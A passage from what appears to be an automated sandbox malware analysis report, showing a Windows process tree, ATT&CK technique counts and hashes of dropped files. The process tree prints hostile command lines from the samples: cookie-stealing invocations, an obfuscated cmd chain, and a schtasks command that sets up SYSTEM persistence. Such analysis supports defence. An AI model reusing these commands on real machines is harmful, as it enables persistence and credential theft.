                                                                                • Executes dropped EXE
                                                                                • Adds Run key to start application
                                                                                PID:5760
                                                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                  3⤵
                                                                                  • Executes dropped EXE
                                                                                  PID:5960
                                                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                  3⤵
                                                                                    PID:4820
                                                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                    3⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:6124
                                                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                    3⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:4536
                                                                              • \??\c:\windows\system32\svchost.exe
                                                                                c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                1⤵
                                                                                • Suspicious use of SetThreadContext
                                                                                • Modifies registry class
                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                • Suspicious use of WriteProcessMemory
                                                                                PID:868
                                                                                • C:\Windows\system32\svchost.exe
                                                                                  C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                  2⤵
                                                                                  • Drops file in System32 directory
                                                                                  • Checks processor information in registry
                                                                                  • Modifies data under HKEY_USERS
                                                                                  PID:1332
                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                1⤵
                                                                                • Drops file in Windows directory
                                                                                • Modifies Internet Explorer settings
                                                                                • Modifies registry class
                                                                                • Suspicious use of SetWindowsHookEx
                                                                                PID:1028
                                                                              • C:\Windows\system32\browser_broker.exe
                                                                                C:\Windows\system32\browser_broker.exe -Embedding
                                                                                1⤵
                                                                                • Modifies Internet Explorer settings
                                                                                PID:2308
                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                1⤵
                                                                                • Modifies registry class
                                                                                • Suspicious behavior: MapViewOfSection
                                                                                • Suspicious use of SetWindowsHookEx
                                                                                PID:3332
                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                1⤵
                                                                                  PID:4452
                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                  1⤵
                                                                                  • Modifies registry class
                                                                                  PID:5020
                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                  1⤵
                                                                                    PID:5768
                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                    1⤵
                                                                                    • Modifies registry class
                                                                                    PID:3080
                                                                                  • \??\c:\windows\system32\svchost.exe
                                                                                    c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                                                                    1⤵
                                                                                    • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                    PID:5404
                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                    1⤵
                                                                                    • Modifies registry class
                                                                                    PID:3800
                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                    1⤵
                                                                                    • Modifies registry class
                                                                                    PID:5612
                                                                                  • C:\Users\Admin\AppData\Local\Temp\A4F6.exe
                                                                                    C:\Users\Admin\AppData\Local\Temp\A4F6.exe
                                                                                    1⤵
                                                                                    • Executes dropped EXE
                                                                                    • Drops startup file
                                                                                    • NTFS ADS
                                                                                    PID:4416
                                                                                  • C:\Users\Admin\AppData\Local\Temp\ACB8.exe
                                                                                    C:\Users\Admin\AppData\Local\Temp\ACB8.exe
                                                                                    1⤵
                                                                                    • Executes dropped EXE
                                                                                    • Loads dropped DLL
                                                                                    PID:5732
                                                                                  • C:\Users\Admin\AppData\Local\Temp\BD62.exe
                                                                                    C:\Users\Admin\AppData\Local\Temp\BD62.exe
                                                                                    1⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:5988
                                                                                  • C:\Users\Admin\AppData\Local\Temp\C37E.exe
                                                                                    C:\Users\Admin\AppData\Local\Temp\C37E.exe
                                                                                    1⤵
                                                                                      PID:6020
                                                                                    • C:\Users\Admin\AppData\Local\Temp\C97A.exe
                                                                                      C:\Users\Admin\AppData\Local\Temp\C97A.exe
                                                                                      1⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:5364
                                                                                      • C:\Windows\SysWOW64\makecab.exe
                                                                                        "C:\Windows\System32\makecab.exe"
                                                                                        2⤵
                                                                                          PID:5632
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          "C:\Windows\System32\cmd.exe" /c iqNOHdjFJRyhysPKrZOyDFL & okDksJPSlGbcVRHiSeznxx & hAaVTUKoBgyGcM & gqwjrmT & cmd < Estate.wms
                                                                                          2⤵
                                                                                            PID:5236
                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                              cmd
                                                                                              3⤵
                                                                                              • Blocklisted process makes network request
                                                                                              • Checks computer location settings
                                                                                              • Checks whether UAC is enabled
                                                                                              • Modifies Internet Explorer settings
                                                                                              • Modifies registry class
                                                                                              PID:4452
                                                                                              • C:\Windows\SysWOW64\findstr.exe
                                                                                                findstr /V /R "^IRYjqEeSlHqUOmgNEQyuRToTmXianaMtsAbasYwuofIOxmdrAdyKMFuPItNebJxSVVDheWcGOYXClxmZHrSojeaLxIJhlZImVQSnVewEUmVNHEEgENczQjFTDRTzjocPdnGzBwrEwghMuFtPrc$" Tele.wms
                                                                                                4⤵
                                                                                                  PID:5924
                                                                                                • C:\Users\Admin\AppData\Roaming\PjaGjBjjgOVdKYNVYmnWuQlkcROabisQzuDJBhnHgwRSAcsfjygDwWgZwukcMTPubtXEctxLwRHtY\Diritto.exe.com
                                                                                                  Diritto.exe.com o
                                                                                                  4⤵
                                                                                                  • Executes dropped EXE
                                                                                                  PID:2304
                                                                                                  • C:\Users\Admin\AppData\Roaming\PjaGjBjjgOVdKYNVYmnWuQlkcROabisQzuDJBhnHgwRSAcsfjygDwWgZwukcMTPubtXEctxLwRHtY\Diritto.exe.com
                                                                                                    C:\Users\Admin\AppData\Roaming\PjaGjBjjgOVdKYNVYmnWuQlkcROabisQzuDJBhnHgwRSAcsfjygDwWgZwukcMTPubtXEctxLwRHtY\Diritto.exe.com o
                                                                                                    5⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Suspicious use of SetThreadContext
                                                                                                    PID:5828
                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                      schtasks.exe /create /tn "xNBSMJllYe" /tr "C:\\Users\\Admin\\AppData\\Roaming\\gXjmjGiawO\\xNBSMJllYe.exe.com C:\\Users\\Admin\\AppData\\Roaming\\gXjmjGiawO\\Q" /sc onstart /F /RU SYSTEM
                                                                                                      6⤵
                                                                                                      • Creates scheduled task(s)
                                                                                                      PID:5056
                                                                                                    • C:\Users\Admin\AppData\Roaming\PjaGjBjjgOVdKYNVYmnWuQlkcROabisQzuDJBhnHgwRSAcsfjygDwWgZwukcMTPubtXEctxLwRHtY\RegAsm.exe
                                                                                                      C:\Users\Admin\AppData\Roaming\PjaGjBjjgOVdKYNVYmnWuQlkcROabisQzuDJBhnHgwRSAcsfjygDwWgZwukcMTPubtXEctxLwRHtY\RegAsm.exe
                                                                                                      6⤵
                                                                                                      • Executes dropped EXE
                                                                                                      PID:1812
                                                                                                • C:\Windows\SysWOW64\PING.EXE
                                                                                                  ping 127.0.0.1 -n 30
                                                                                                  4⤵
                                                                                                  • Runs ping.exe
                                                                                                  PID:356
                                                                                          • C:\Windows\SysWOW64\explorer.exe
                                                                                            C:\Windows\SysWOW64\explorer.exe
                                                                                            1⤵
                                                                                              PID:6132
                                                                                            • C:\Windows\explorer.exe
                                                                                              C:\Windows\explorer.exe
                                                                                              1⤵
                                                                                                PID:5508
                                                                                              • C:\Windows\SysWOW64\explorer.exe
                                                                                                C:\Windows\SysWOW64\explorer.exe
                                                                                                1⤵
                                                                                                  PID:4420
                                                                                                • C:\Windows\explorer.exe
                                                                                                  C:\Windows\explorer.exe
                                                                                                  1⤵
                                                                                                  • Suspicious behavior: MapViewOfSection
                                                                                                  PID:5900
                                                                                                • C:\Windows\SysWOW64\explorer.exe
                                                                                                  C:\Windows\SysWOW64\explorer.exe
                                                                                                  1⤵
                                                                                                  • Executes dropped EXE
                                                                                                  PID:6020
                                                                                                • C:\Windows\explorer.exe
                                                                                                  C:\Windows\explorer.exe
                                                                                                  1⤵
                                                                                                  • Suspicious behavior: MapViewOfSection
                                                                                                  PID:6132
                                                                                                • C:\Windows\SysWOW64\explorer.exe
                                                                                                  C:\Windows\SysWOW64\explorer.exe
                                                                                                  1⤵
                                                                                                    PID:4752
                                                                                                  • C:\Windows\explorer.exe
                                                                                                    C:\Windows\explorer.exe
                                                                                                    1⤵
                                                                                                    • Suspicious behavior: MapViewOfSection
                                                                                                    PID:4192
                                                                                                  • C:\Windows\SysWOW64\explorer.exe
                                                                                                    C:\Windows\SysWOW64\explorer.exe
                                                                                                    1⤵
                                                                                                      PID:6128
                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                      C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                      1⤵
                                                                                                        PID:1512
                                                                                                      • \??\c:\windows\system32\svchost.exe
                                                                                                        c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
                                                                                                        1⤵
                                                                                                          PID:5272
                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                          C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                          1⤵
                                                                                                            PID:4672
                                                                                                          • \??\c:\windows\system32\svchost.exe
                                                                                                            c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
                                                                                                            1⤵
                                                                                                              PID:4916
                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                              1⤵
                                                                                                              • Drops file in Windows directory
                                                                                                              • Modifies registry class
                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                              PID:5320
                                                                                                            • C:\Windows\system32\browser_broker.exe
                                                                                                              C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                              1⤵
                                                                                                              • Modifies Internet Explorer settings
                                                                                                              PID:1480
                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                              1⤵
                                                                                                              • Modifies registry class
                                                                                                              • Suspicious behavior: MapViewOfSection
                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                              PID:5092
                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                              1⤵
                                                                                                              • Modifies registry class
                                                                                                              PID:5536
                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                              1⤵
                                                                                                              • Modifies registry class
                                                                                                              PID:2500
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\9DDB.exe
                                                                                                              C:\Users\Admin\AppData\Local\Temp\9DDB.exe
                                                                                                              1⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • Suspicious use of SetThreadContext
                                                                                                              PID:6004
                                                                                                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                2⤵
                                                                                                                  PID:5060
                                                                                                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                  C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                  2⤵
                                                                                                                    PID:3076

                                                                                                                Network

                                                                                                                MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                Execution

                                                                                                                Scheduled Task

                                                                                                                1
                                                                                                                T1053

                                                                                                                Persistence

                                                                                                                Registry Run Keys / Startup Folder

                                                                                                                1
                                                                                                                T1060

                                                                                                                Scheduled Task

                                                                                                                1
                                                                                                                T1053

                                                                                                                BITS Jobs

                                                                                                                1
                                                                                                                T1197

                                                                                                                Privilege Escalation

                                                                                                                Scheduled Task

                                                                                                                1
                                                                                                                T1053

                                                                                                                Defense Evasion

                                                                                                                Disabling Security Tools

                                                                                                                2
                                                                                                                T1089

                                                                                                                Modify Registry

                                                                                                                5
                                                                                                                T1112

                                                                                                                BITS Jobs

                                                                                                                1
                                                                                                                T1197

                                                                                                                Install Root Certificate

                                                                                                                1
                                                                                                                T1130

                                                                                                                Credential Access

                                                                                                                Credentials in Files

                                                                                                                4
                                                                                                                T1081

                                                                                                                Discovery

                                                                                                                Software Discovery

                                                                                                                1
                                                                                                                T1518

                                                                                                                Query Registry

                                                                                                                4
                                                                                                                T1012

                                                                                                                System Information Discovery

                                                                                                                5
                                                                                                                T1082

                                                                                                                Security Software Discovery

                                                                                                                1
                                                                                                                T1063

                                                                                                                Peripheral Device Discovery

                                                                                                                1
                                                                                                                T1120

                                                                                                                Remote System Discovery

                                                                                                                1
                                                                                                                T1018

                                                                                                                Collection

                                                                                                                Data from Local System

                                                                                                                4
                                                                                                                T1005

                                                                                                                Command and Control

                                                                                                                Web Service

                                                                                                                1
                                                                                                                T1102

                                                                                                                Replay Monitor

                                                                                                                Loading Replay Monitor...

                                                                                                                Downloads

                                                                                                                • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                                  MD5

                                                                                                                  7124be0b78b9f4976a9f78aaeaed893a

                                                                                                                  SHA1

                                                                                                                  804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

                                                                                                                  SHA256

                                                                                                                  bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

                                                                                                                  SHA512

                                                                                                                  49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

                                                                                                                • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                                  MD5

                                                                                                                  7124be0b78b9f4976a9f78aaeaed893a

                                                                                                                  SHA1

                                                                                                                  804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

                                                                                                                  SHA256

                                                                                                                  bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

                                                                                                                  SHA512

                                                                                                                  49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

                                                                                                                • C:\Program Files\Microsoft Office\YNRNZUYQEG\ultramediaburner.exe
                                                                                                                  MD5

                                                                                                                  6103ca066cd5345ec41feaf1a0fdadaf

                                                                                                                  SHA1

                                                                                                                  938acc555933ee4887629048be4b11df76bb8de8

                                                                                                                  SHA256

                                                                                                                  b8d950bf6fa228454571f15cc4b7b6fbaa539f1284e43946abd90934db925201

                                                                                                                  SHA512

                                                                                                                  a9062e1fac2f6073a134d9756c84f70999240e36a98cb39684018e7d5bd3772f2ca21ab35bd2c6bd60413eb7306376e7f530e78ce4ebcfe256f766e8c42d16b3

                                                                                                                • C:\Program Files\Microsoft Office\YNRNZUYQEG\ultramediaburner.exe
                                                                                                                  MD5

                                                                                                                  6103ca066cd5345ec41feaf1a0fdadaf

                                                                                                                  SHA1

                                                                                                                  938acc555933ee4887629048be4b11df76bb8de8

                                                                                                                  SHA256

                                                                                                                  b8d950bf6fa228454571f15cc4b7b6fbaa539f1284e43946abd90934db925201

                                                                                                                  SHA512

                                                                                                                  a9062e1fac2f6073a134d9756c84f70999240e36a98cb39684018e7d5bd3772f2ca21ab35bd2c6bd60413eb7306376e7f530e78ce4ebcfe256f766e8c42d16b3

                                                                                                                • C:\Program Files\install.dat
                                                                                                                  MD5

                                                                                                                  806c3221a013fec9530762750556c332

                                                                                                                  SHA1

                                                                                                                  36475bcfd0a18555d7c0413d007bbe80f7d321b5

                                                                                                                  SHA256

                                                                                                                  9bcecc5fb84d21db673c81a7ed1d10b28686b8261f79136f748ab7bbad7752f7

                                                                                                                  SHA512

                                                                                                                  56bbaafe7b0883f4e5dcff00ae69339a3b81ac8ba90b304aeab3e4e7e7523b568fd9b269241fc38a39f74894084f1f252a91c22b79cc0a16f9e135859a13145e

                                                                                                                • C:\Program Files\install.dll
                                                                                                                  MD5

                                                                                                                  fe60ddbeab6e50c4f490ddf56b52057c

                                                                                                                  SHA1

                                                                                                                  6a71fdf73761a1192fd9c6961f66754a63d6db17

                                                                                                                  SHA256

                                                                                                                  9fcfa73600ff1b588015ffa20779cec6714e48ee6ae15db8766f7ffd5ee3031d

                                                                                                                  SHA512

                                                                                                                  0113b47ba1a33a2f597a26c9b66435483373cde4edb183e0e92abef8ed003743f426ba5ffe25a5807c030cc14d8a95d73aa6af95a85f44a86dd40264ecb96536

                                                                                                                • C:\ProgramData\5096488.exe
                                                                                                                  MD5

                                                                                                                  055a20b8347170594cbc8b8aa2197b2a

                                                                                                                  SHA1

                                                                                                                  9bd84ab6cb4df6cb0fd1c7a0fe7efe31357e1f10

                                                                                                                  SHA256

                                                                                                                  03c8a390f7030ea876188436d6cbe99592b739d40a53e60ad0869c4c6194d828

                                                                                                                  SHA512

                                                                                                                  914c928a4060ddc2bda4e96918c22c4df14160e869a6c5b62eeafe7bb1044006993532e55929d2d89bac08c1b896619b016a2caf6011d155646fb7421ba3b6f2

                                                                                                                • C:\ProgramData\5096488.exe
                                                                                                                  MD5

                                                                                                                  055a20b8347170594cbc8b8aa2197b2a

                                                                                                                  SHA1

                                                                                                                  9bd84ab6cb4df6cb0fd1c7a0fe7efe31357e1f10

                                                                                                                  SHA256

                                                                                                                  03c8a390f7030ea876188436d6cbe99592b739d40a53e60ad0869c4c6194d828

                                                                                                                  SHA512

                                                                                                                  914c928a4060ddc2bda4e96918c22c4df14160e869a6c5b62eeafe7bb1044006993532e55929d2d89bac08c1b896619b016a2caf6011d155646fb7421ba3b6f2

                                                                                                                • C:\ProgramData\Windows Host\Windows Host.exe
                                                                                                                  MD5

                                                                                                                  055a20b8347170594cbc8b8aa2197b2a

                                                                                                                  SHA1

                                                                                                                  9bd84ab6cb4df6cb0fd1c7a0fe7efe31357e1f10

                                                                                                                  SHA256

                                                                                                                  03c8a390f7030ea876188436d6cbe99592b739d40a53e60ad0869c4c6194d828

                                                                                                                  SHA512

                                                                                                                  914c928a4060ddc2bda4e96918c22c4df14160e869a6c5b62eeafe7bb1044006993532e55929d2d89bac08c1b896619b016a2caf6011d155646fb7421ba3b6f2

                                                                                                                • C:\ProgramData\Windows Host\Windows Host.exe
                                                                                                                  MD5

                                                                                                                  055a20b8347170594cbc8b8aa2197b2a

                                                                                                                  SHA1

                                                                                                                  9bd84ab6cb4df6cb0fd1c7a0fe7efe31357e1f10

                                                                                                                  SHA256

                                                                                                                  03c8a390f7030ea876188436d6cbe99592b739d40a53e60ad0869c4c6194d828

                                                                                                                  SHA512

                                                                                                                  914c928a4060ddc2bda4e96918c22c4df14160e869a6c5b62eeafe7bb1044006993532e55929d2d89bac08c1b896619b016a2caf6011d155646fb7421ba3b6f2

                                                                                                                • C:\Users\Admin\AppData\Local\Temp\2zydpax3.qm5\md1_1eaf.exe
                                                                                                                  MD5

                                                                                                                  25d9f83dc738b4894cf159c6a9754e40

                                                                                                                  SHA1

                                                                                                                  152a0e0a8319c8d6bfbe6ae71ae5dda5cba2caca

                                                                                                                  SHA256

                                                                                                                  8216cf00254d2febdfa67014d7265e008a6f485724c68579c5921f91a0069135

                                                                                                                  SHA512

                                                                                                                  41a995bd29eaaf8b9ebed313f33eaf6ba217e331341888feb274df22328aca34a15bc0dd761cbdadf8d0491ed80d18025b88d8e1db862be2a886d99005b11f22

                                                                                                                • C:\Users\Admin\AppData\Local\Temp\2zydpax3.qm5\md1_1eaf.exe
                                                                                                                  MD5

                                                                                                                  25d9f83dc738b4894cf159c6a9754e40

                                                                                                                  SHA1

                                                                                                                  152a0e0a8319c8d6bfbe6ae71ae5dda5cba2caca

                                                                                                                  SHA256

                                                                                                                  8216cf00254d2febdfa67014d7265e008a6f485724c68579c5921f91a0069135

                                                                                                                  SHA512

                                                                                                                  41a995bd29eaaf8b9ebed313f33eaf6ba217e331341888feb274df22328aca34a15bc0dd761cbdadf8d0491ed80d18025b88d8e1db862be2a886d99005b11f22

                                                                                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe
                                                                                                                  MD5

                                                                                                                  41a5f4fd1ea7cac4aa94a87aebccfef0

                                                                                                                  SHA1

                                                                                                                  0d0abf079413a4c773754bf4fda338dc5b9a8ddc

                                                                                                                  SHA256

                                                                                                                  97e95e99fd499ec45a7c1d8683d5731ce5e7a8fb8b710622e578cd169a00d8d9

                                                                                                                  SHA512

                                                                                                                  5ca14bda498f26efff4e1179969b8f2c25244063c7bf25f3ec20b5cd24b5be320bbfb8b3d0b2d66f5c5b415da777a766fece5f251a4247773c6cb991417fb75f

                                                                                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe
                                                                                                                  MD5

                                                                                                                  41a5f4fd1ea7cac4aa94a87aebccfef0

                                                                                                                  SHA1

                                                                                                                  0d0abf079413a4c773754bf4fda338dc5b9a8ddc

                                                                                                                  SHA256

                                                                                                                  97e95e99fd499ec45a7c1d8683d5731ce5e7a8fb8b710622e578cd169a00d8d9

                                                                                                                  SHA512

                                                                                                                  5ca14bda498f26efff4e1179969b8f2c25244063c7bf25f3ec20b5cd24b5be320bbfb8b3d0b2d66f5c5b415da777a766fece5f251a4247773c6cb991417fb75f

                                                                                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe
                                                                                                                  MD5

                                                                                                                  3b1b318df4d314a35dce9e8fd89e5121

                                                                                                                  SHA1

                                                                                                                  55b0f8d56212a74bda0fc5f8cc0632ef52a4bc71

                                                                                                                  SHA256

                                                                                                                  4df9e7fcd10900ae5def897377f54856b0ddad1798fa22614eba56096940885b

                                                                                                                  SHA512

                                                                                                                  f04faca320d344378dd31bf05556fb3ac02873e46e2140d5858162e739f5c25bc9b32d619587c84c36b768b9193ea5292d63f62bb0b8458b35d65959b52df6b4

                                                                                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe
                                                                                                                  MD5

                                                                                                                  3b1b318df4d314a35dce9e8fd89e5121

                                                                                                                  SHA1

                                                                                                                  55b0f8d56212a74bda0fc5f8cc0632ef52a4bc71

                                                                                                                  SHA256

                                                                                                                  4df9e7fcd10900ae5def897377f54856b0ddad1798fa22614eba56096940885b

                                                                                                                  SHA512

                                                                                                                  f04faca320d344378dd31bf05556fb3ac02873e46e2140d5858162e739f5c25bc9b32d619587c84c36b768b9193ea5292d63f62bb0b8458b35d65959b52df6b4

                                                                                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe
                                                                                                                  MD5

                                                                                                                  3bc84c0e8831842f2ae263789217245d

                                                                                                                  SHA1

                                                                                                                  d60b174c7f8372036da1eb0a955200b1bb244387

                                                                                                                  SHA256

                                                                                                                  757e7c2569cc52c9e1639fbca06e957cb40f775d5cb1a8aafa670131b62b0824

                                                                                                                  SHA512

                                                                                                                  f3117a6bd79db1d67dce2c67d539c56c177caed9f0b5b019dfb0034f28cb2e79e248893171c2ad78cbca358c2f5813edb17f0126ab40cfe08f9a6357f233f2e4

                                                                                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe
                                                                                                                  MD5

                                                                                                                  3bc84c0e8831842f2ae263789217245d

                                                                                                                  SHA1

                                                                                                                  d60b174c7f8372036da1eb0a955200b1bb244387

                                                                                                                  SHA256

                                                                                                                  757e7c2569cc52c9e1639fbca06e957cb40f775d5cb1a8aafa670131b62b0824

                                                                                                                  SHA512

                                                                                                                  f3117a6bd79db1d67dce2c67d539c56c177caed9f0b5b019dfb0034f28cb2e79e248893171c2ad78cbca358c2f5813edb17f0126ab40cfe08f9a6357f233f2e4

                                                                                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX0\jg6_6asg.exe
                                                                                                                  MD5

                                                                                                                  25d9f83dc738b4894cf159c6a9754e40

                                                                                                                  SHA1

                                                                                                                  152a0e0a8319c8d6bfbe6ae71ae5dda5cba2caca

                                                                                                                  SHA256

                                                                                                                  8216cf00254d2febdfa67014d7265e008a6f485724c68579c5921f91a0069135

                                                                                                                  SHA512

                                                                                                                  41a995bd29eaaf8b9ebed313f33eaf6ba217e331341888feb274df22328aca34a15bc0dd761cbdadf8d0491ed80d18025b88d8e1db862be2a886d99005b11f22

                                                                                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX0\jg6_6asg.exe
                                                                                                                  MD5

                                                                                                                  25d9f83dc738b4894cf159c6a9754e40

                                                                                                                  SHA1

                                                                                                                  152a0e0a8319c8d6bfbe6ae71ae5dda5cba2caca

                                                                                                                  SHA256

                                                                                                                  8216cf00254d2febdfa67014d7265e008a6f485724c68579c5921f91a0069135

                                                                                                                  SHA512

                                                                                                                  41a995bd29eaaf8b9ebed313f33eaf6ba217e331341888feb274df22328aca34a15bc0dd761cbdadf8d0491ed80d18025b88d8e1db862be2a886d99005b11f22

                                                                                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe
                                                                                                                  MD5

                                                                                                                  e72eb3a565d7b5b83c7ff6fad519c6c9

                                                                                                                  SHA1

                                                                                                                  1a2668a26b01828eec1415aa614743abb0a4fb70

                                                                                                                  SHA256

                                                                                                                  8ff1e74643983f7ca9bca70f1bea562e805a86421defde1bd57fc0da3722f599

                                                                                                                  SHA512

                                                                                                                  71ae4db9c307c068f31a4e6471d950d1112d89d5661a4960dffbf6a7343cc313f98cfc35c5a10d38aae68be4b0a3f6a702fd5c28d938ca00094b26d0bcf03da3

                                                                                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe
                                                                                                                  MD5

                                                                                                                  e72eb3a565d7b5b83c7ff6fad519c6c9

                                                                                                                  SHA1

